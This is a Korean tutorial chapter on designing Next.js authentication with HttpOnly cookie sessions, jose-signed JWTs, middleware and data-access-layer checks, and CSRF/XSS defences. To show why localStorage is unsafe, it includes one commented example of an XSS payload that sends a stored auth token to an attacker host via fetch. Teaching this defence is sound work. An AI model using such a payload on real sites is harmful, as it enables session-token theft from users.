🚀 Next.js 심화 7장: Authentication Architecture — 미들웨어 + DAL + 세션 보안 설계

📋 개요

Middleware + DAL + Session 패턴으로 Next.js 앱의 인증을 안전하게 설계합니다.

📋 목차

📌 이 문서를 읽기 전에
🤔 왜 알아야 하는가
🏗️ 비유로 먼저 이해하기
🧩 인증(Authentication)의 세 기둥 🟢
🔑 세션 관리: HttpOnly 쿠키 vs localStorage 🟡
🛡️ 세션 생성과 검증 구현 🟡
🚪 미들웨어 + DAL 2단계 방어 구조 🔴
🔒 보안 강화: CSRF, XSS 방어 🔴
💥 에러 해결 카탈로그
[🏁 이번에 배운 내용 총정리](#-이번에 배운-내용-총정리)
📝 마무리 퀴즈
🔗 더 알아보기

📌 이 문서를 읽기 전에

⏱️ 예상 읽기 시간: 20분 (전체) / 핵심 파트만: 10분

🗺️ 이 문서의 배경 세계관: '영수네 커뮤니티'

영철(신입): "로그인 기능 만들었는데요, 로그인 성공하면 JWT를 localStorage에 저장하고 있어요. API 호출할 때마다 Authorization: Bearer ${token} 헤더 붙이고요. 이게 보통 하는 방식 아닌가요?"
영호(리드): "영철 님... 그 방법은 XSS 공격에 완전히 무방비예요. JS로 localStorage에 접근할 수 있으니 악성 스크립트 하나만 삽입되면 모든 사용자 토큰이 탈취돼요. Next.js App Router에서는 HttpOnly 쿠키로 토큰을 보호하고, 서버 컴포넌트에서만 세션을 검증해야 해요."

🗺️ 이 문서의 흐름
인증의 3기둥 → 세션 저장 방법 비교 → 세션 생성/검증 구현 → 미들웨어 + DAL 2단계 방어 → 보안 헤더

🎯 이 문서를 다 읽으면 할 수 있는 것

localStorage 대신 HttpOnly 쿠키로 세션을 안전하게 관리할 수 있다
미들웨어(1차)와 DAL(2차)로 이중 인증 체계를 설계할 수 있다
CSRF와 XSS 공격이 어떻게 동작하고 어떻게 방어하는지 설명할 수 있다

🤔 왜 알아야 하는가

인증은 "이 사람이 누구인가?" 를 확인하는 과정이야. 잘못 구현하면 서비스의 모든 데이터가 위험해져.

Next.js App Router가 등장하면서 인증 구현 방식이 크게 바뀌었어:

과거 SPA 방식: 클라이언트에서 API 호출 → JWT를 localStorage 저장 → 모든 요청에 헤더 첨부
App Router 방식: 서버 컴포넌트가 기본 → 서버에서 세션 검증 → HttpOnly 쿠키로 토큰 보호

왜 바꿔야 하냐고? localStorage는 JavaScript로 접근 가능하기 때문이야. XSS 공격 하나로 모든 사용자의 토큰이 털릴 수 있어.

🏗️ 비유로 먼저 이해하기

🧒 5살에게 설명한다면?
비밀 금고에 열쇠(JWT)를 보관한다고 상상해봐.

localStorage에 저장 = 열쇠를 책상 위에 올려놓기. 누구나 볼 수 있어. 나쁜 사람이 방에 들어오면(XSS) 바로 가져가.

HttpOnly 쿠키 = 열쇠를 금고 안에 넣기. 열쇠 주인(서버)만 꺼낼 수 있어. 나쁜 사람이 방에 들어와도(XSS) 금고는 못 열어.

인증의 2단계 방어:

1차 방어 (Middleware)   → "열쇠 있어요?" 빠른 체크, 없으면 문 앞에서 차단
2차 방어 (DAL)          → "열쇠가 진짜예요? 이 방 들어갈 권한 있어요?" 실제 검증

🧩 인증(Authentication)의 세 기둥 🟢

🎯 이 섹션을 읽고 나면:

인증, 세션 관리, 권한 부여의 차이를 명확히 구분할 수 있다

Next.js 인증 시스템은 세 가지 개념으로 나뉘어:

기둥	의미	담당 위치
인증(Authentication)	"당신이 누구인가?" — 신원 확인	Server Action (로그인 처리)
세션 관리(Session)	"당신이 로그인한 상태임을 기억"	HttpOnly 쿠키 + 암호화
권한 부여(Authorization)	"이 작업을 할 권한이 있는가?"	Middleware (1차) + DAL (2차)

🔑 세션 관리: HttpOnly 쿠키 vs localStorage 🟡

🎯 이 섹션을 읽고 나면:

HttpOnly 쿠키와 localStorage의 보안 차이를 설명할 수 있다

App Router에서 HttpOnly 쿠키를 사용해야 하는 이유를 이해한다

🤔 잠깐, 먼저 생각해봐
브라우저에서 document.cookie로 모든 쿠키를 읽을 수 있다고 알고 있지?
그런데 HttpOnly 쿠키는 document.cookie로 읽을 수 없어. 왜 그럴까?

비교:

특성	`localStorage`	`HttpOnly 쿠키`
JS 접근	`localStorage.getItem()` 가능	❌ JS 접근 불가
XSS 취약성	🔴 매우 취약 (JS 탈취 가능)	🟢 보호됨
SSR 지원	❌ 서버에서 읽기 불가	✅ 서버 요청마다 자동 전송
서버 컴포넌트 호환	❌ 불가	✅ `cookies()` API로 읽기 가능
만료 설정	수동 처리 필요	브라우저가 자동 처리

// ❌ 영철이의 위험한 방식 — localStorage 사용
// 클라이언트 컴포넌트에서
const token = localStorage.getItem('auth_token')
// XSS 공격으로 악성 스크립트가 삽입되면:
// document.querySelector('script').textContent = `
//   fetch('https://attacker.com?' + localStorage.getItem('auth_token'))
// `
// 토큰이 공격자 서버로 전송됨!
 
// ✅ 영호의 안전한 방식 — HttpOnly 쿠키
// Server Action에서 쿠키 설정 (서버에서만 실행)
(await cookies()).set('session', encryptedToken, {
  httpOnly: true,   // JS 접근 불가 → XSS 방어
  secure: true,     // HTTPS에서만 전송
  sameSite: 'lax',  // CSRF 방어
  maxAge: 60 * 60 * 24 * 7,  // 7일
})

🛡️ 세션 생성과 검증 구현 🟡

🎯 이 섹션을 읽고 나면:

jose 라이브러리로 JWT를 생성하고 검증할 수 있다

Server Action으로 로그인을 처리하는 전체 흐름을 구현할 수 있다

// lib/auth.ts — 세션 암호화/복호화
import 'server-only'
import { SignJWT, jwtVerify } from 'jose'   // Edge 호환 JWT 라이브러리
 
const secretKey = process.env.SESSION_SECRET!
const encodedKey = new TextEncoder().encode(secretKey)
 
type SessionPayload = {
  userId: string
  role: 'user' | 'admin'
  expiresAt: Date
}
 
// 세션 암호화 (JWT 생성)
export async function encrypt(payload: SessionPayload): Promise<string> {
  return new SignJWT(payload)
    .setProtectedHeader({ alg: 'HS256' })
    .setIssuedAt()
    .setExpirationTime('7d')           // 7일 만료
    .sign(encodedKey)
}
 
// 세션 복호화 (JWT 검증)
export async function decrypt(token: string): Promise<SessionPayload | null> {
  try {
    const { payload } = await jwtVerify(token, encodedKey, {
      algorithms: ['HS256'],
    })
    return payload as unknown as SessionPayload
  } catch {
    // 토큰이 만료됐거나 변조된 경우
    return null
  }
}

// lib/session.ts — 세션 생성/조회/삭제
import 'server-only'
import { cookies } from 'next/headers'
import { encrypt, decrypt } from './auth'
 
export async function createSession(userId: string, role: 'user' | 'admin') {
  const expiresAt = new Date(Date.now() + 7 * 24 * 60 * 60 * 1000)
  const session = await encrypt({ userId, role, expiresAt })
 
  const cookieStore = await cookies()
  cookieStore.set('session', session, {
    httpOnly: true,
    secure: process.env.NODE_ENV === 'production',
    sameSite: 'lax',
    expires: expiresAt,
    path: '/',
  })
}
 
export async function getSession() {
  const cookieStore = await cookies()
  const sessionCookie = cookieStore.get('session')?.value
  if (!sessionCookie) return null
  return decrypt(sessionCookie)
}
 
export async function deleteSession() {
  const cookieStore = await cookies()
  cookieStore.delete('session')
}

// lib/actions/auth.actions.ts — 로그인 Server Action
'use server'
import { redirect } from 'next/navigation'
import { createSession } from '../session'
import { db } from '../db'
import bcrypt from 'bcryptjs'
 
export async function login(prevState: unknown, formData: FormData) {
  const email = formData.get('email') as string
  const password = formData.get('password') as string
 
  // DB에서 사용자 조회
  const user = await db.user.findUnique({ where: { email } })
 
  // 비밀번호 검증 (bcrypt는 서버에서만 실행 — Node.js Runtime)
  if (!user || !(await bcrypt.compare(password, user.passwordHash))) {
    return { error: '이메일 또는 비밀번호가 올바르지 않아요' }
  }
 
  // 세션 생성 → HttpOnly 쿠키에 저장
  await createSession(user.id, user.role)
 
  // 로그인 성공 → 대시보드로 이동
  redirect('/dashboard')
}
 
export async function logout() {
  await deleteSession()
  redirect('/login')
}

🚪 미들웨어 + DAL 2단계 방어 구조 🔴

🎯 이 섹션을 읽고 나면:

미들웨어(1차)와 DAL(2차)이 각각 무엇을 검증하는지 설명할 수 있다

왜 2단계인가?

미들웨어(Edge)에서 무거운 검증은 불가해. 하지만 DAL에서만 검증하면 보호되지 않은 경로에서 느린 검증을 기다려야 해. 그래서 역할을 나눠:

// middleware.ts — 1차 방어: "세션 쿠키가 존재하는가?"
import { NextResponse } from 'next/server'
import type { NextRequest } from 'next/server'
 
const PROTECTED_PATHS = ['/dashboard', '/my', '/settings', '/posts/write']
 
export async function middleware(request: NextRequest) {
  const { pathname } = request.nextUrl
 
  const isProtected = PROTECTED_PATHS.some((path) => pathname.startsWith(path))
  if (!isProtected) return NextResponse.next()
 
  const sessionCookie = request.cookies.get('session')?.value
 
  // 빠른 1차 체크: 쿠키 존재 여부만
  // 실제 JWT 검증은 Edge에서 jose로 가능하지만 선택적
  if (!sessionCookie) {
    const loginUrl = new URL('/login', request.url)
    loginUrl.searchParams.set('callbackUrl', pathname)
    return NextResponse.redirect(loginUrl)
  }
 
  return NextResponse.next()
}

// lib/dal.ts — 2차 방어: "세션이 유효한가? 이 작업 권한이 있는가?"
import 'server-only'
import { getSession } from './session'
import { db } from './db'
 
export async function verifySession() {
  const session = await getSession()
  if (!session) {
    // 세션 없으면 즉시 401 처리
    throw new Error('UNAUTHORIZED')
  }
  return session
}
 
// 게시글 삭제 — 작성자 또는 관리자만 가능
export async function deletePost(postId: string) {
  const session = await verifySession()  // 세션 검증
 
  const post = await db.post.findUnique({ where: { id: postId } })
  if (!post) throw new Error('NOT_FOUND')
 
  // 권한 체크: 작성자이거나 관리자여야 함
  if (post.authorId !== session.userId && session.role !== 'admin') {
    throw new Error('FORBIDDEN')
  }
 
  return db.post.delete({ where: { id: postId } })
}

🔒 보안 강화: CSRF, XSS 방어 🔴

🛡️ CSRF 방어 — `sameSite` 쿠키 설정

CSRF(Cross-Site Request Forgery): 악성 사이트에서 사용자 몰래 우리 서버로 요청을 보내는 공격.

// sameSite 설정으로 CSRF 방어
cookieStore.set('session', session, {
  httpOnly: true,
  secure: true,
  sameSite: 'lax',    // 외부 사이트에서 POST 요청 시 쿠키 전송 안 함
  // sameSite: 'strict' → 더 강력하지만 일부 OAuth 리디렉트가 깨질 수 있음
})

Server Action의 CSRF 내장 방어:

Next.js Server Action은 내부적으로 CSRF 토큰 없이도 보호돼. 각 Server Action 함수에 암호화된 비결정적 ID를 할당해서 공격자가 엔드포인트를 유추하기 어렵게 만들어.

🛡️ XSS 방어 — CSP 헤더

// middleware.ts에서 CSP 헤더 설정
response.headers.set(
  'Content-Security-Policy',
  "default-src 'self'; script-src 'self' 'nonce-{nonce}'; style-src 'self' 'unsafe-inline';"
)

💥 에러 해결 카탈로그

❌ `cookies() was called outside a request scope`

원인: cookies()를 Server Action이나 서버 컴포넌트가 아닌 곳에서 호출.

해결책: cookies()는 반드시 서버 컴포넌트, Server Action, Route Handler 안에서만 사용해.

❌ `jose` 토큰 검증 실패 — `JWTExpired`

원인: 토큰 만료. 정상적인 동작이지만 핸들링이 필요.

해결책:

try {
  const { payload } = await jwtVerify(token, encodedKey)
  return payload
} catch (err) {
  if (err instanceof errors.JWTExpired) {
    // 만료 → 리프레시 또는 재로그인 유도
    return null
  }
  // 기타 검증 실패
  return null
}

🏁 이번에 배운 내용 총정리

📋 인증 구현 체크리스트

항목	구현 위치	중요도
세션 암호화 (`jose`)	`lib/auth.ts`	필수
`HttpOnly` 쿠키 설정	`lib/session.ts`	필수
로그인 Server Action	`lib/actions/auth.actions.ts`	필수
1차 미들웨어 방어	`middleware.ts`	필수
2차 DAL 방어	`lib/dal.ts`	필수
`server-only` import	`lib/` 파일 최상단	강력 권장

⚠️ 절대 하지 말 것

상황	❌ 나쁜 예	✅ 좋은 예
토큰 저장	`localStorage.setItem('token', jwt)`	`HttpOnly` 쿠키
미들웨어만으로 보호	Middleware만 믿고 DAL 검증 생략	Middleware + DAL 이중 방어
권한 체크 위치	클라이언트 컴포넌트에서	서버(DAL)에서 최종 검증

📝 마무리 퀴즈

Q1. HttpOnly 쿠키가 XSS 공격에 강한 이유는?

A) 쿠키 값이 암호화되어 있어서
B) JavaScript로 document.cookie를 통해 접근할 수 없어서
C) HTTPS에서만 전송되어서
D) 쿠키의 만료 시간이 짧아서

✅ 정답: B

해설: HttpOnly 속성은 브라우저에게 "이 쿠키는 JavaScript로 접근 불가"라고 알려. XSS로 악성 스크립트가 실행돼도 document.cookie로 이 쿠키를 읽을 수 없어. 암호화(A)와 HTTPS(C)는 별개의 보안 요소야.

📌 핵심 기억법: HttpOnly = "HTTP 요청에만 사용, JS는 건들지 마."

Q2. 다음 중 미들웨어에서 해야 하는 것과 DAL에서 해야 하는 것을 올바르게 짝지은 것은?

A) 미들웨어: DB에서 사용자 권한 조회 / DAL: 쿠키 존재 여부 확인
B) 미들웨어: 쿠키 존재 여부 확인 / DAL: JWT 유효성 + 권한 검증
C) 미들웨어: JWT 완전 검증 / DAL: 비밀번호 확인
D) 미들웨어: 권한 부여 / DAL: 세션 생성

✅ 정답: B

해설: Middleware는 Edge에서 빠르게 실행돼야 하니 "쿠키 있나?"만 확인. 무거운 DB 조회나 JWT 완전 검증은 DAL에서.

📌 핵심 기억법: "Middleware = 경비원 눈 확인, DAL = 신분증 진짜인지 정밀 검사."

Q3. 친구에게 설명한다면?

CSRF 공격이 어떻게 동작하는지, sameSite: 'lax'가 어떻게 막는지 설명해봐.

예시 답변:

"CSRF는 가짜 사이트에서 몰래 우리 서버에 요청 보내는 공격이야. 예를 들어 evil.com에서 버튼 클릭하면 youngsu.community/delete-account로 POST 요청이 가. 브라우저는 쿠키를 자동으로 붙여보내니까 로그인한 것처럼 처리될 수 있어. sameSite: 'lax'는 '다른 사이트에서 시작된 POST 요청엔 쿠키 보내지 마'야. evil.com → youngsu.community POST 요청엔 세션 쿠키가 안 붙어서 CSRF가 실패해."

🐣 영철이의 퇴근 일기

오늘은 정말 넥스트의 보안 요새를 구축하는 'Authentication Architecture' 를 배우면서 개발자로서의 책임감을 무겁게 느낀 날이야. 그동안 단순히 "로그인하면 끝" 인 줄 알았는데, HttpOnly 쿠키부터 미들웨어와 DAL의 2단계 방어막까지... 정말 꼼꼼하게 설계해야 한다는 걸 깨달았어.

💡 오늘의 교훈: "보안은 편의성과 타협할 수 없는 영역이다. HttpOnly 쿠키로 XSS를 막고, 미들웨어(1차)와 DAL(2차)의 이중 방어막으로 서비스의 안전을 끝까지 책임지자!"

영호 리드 님이 경비원과 신분증 비유를 들어 설명해 주실 때, 복잡한 인증 흐름이 머릿속에 지도처럼 그려지더라. 사용자의 소중한 정보를 지키는 게 얼마나 가치 있는 일인지 다시 한번 생각하게 됐어. 오늘 너무 긴장하면서 코드를 짰더니 온몸이 찌릿찌릿하네. 퇴근하고 집 가서 따뜻한 물로 샤워하고 푹 쉬어야지. 내일은 더 '믿음직한' 서비스를 만드는 개발자가 될 거야! 🐣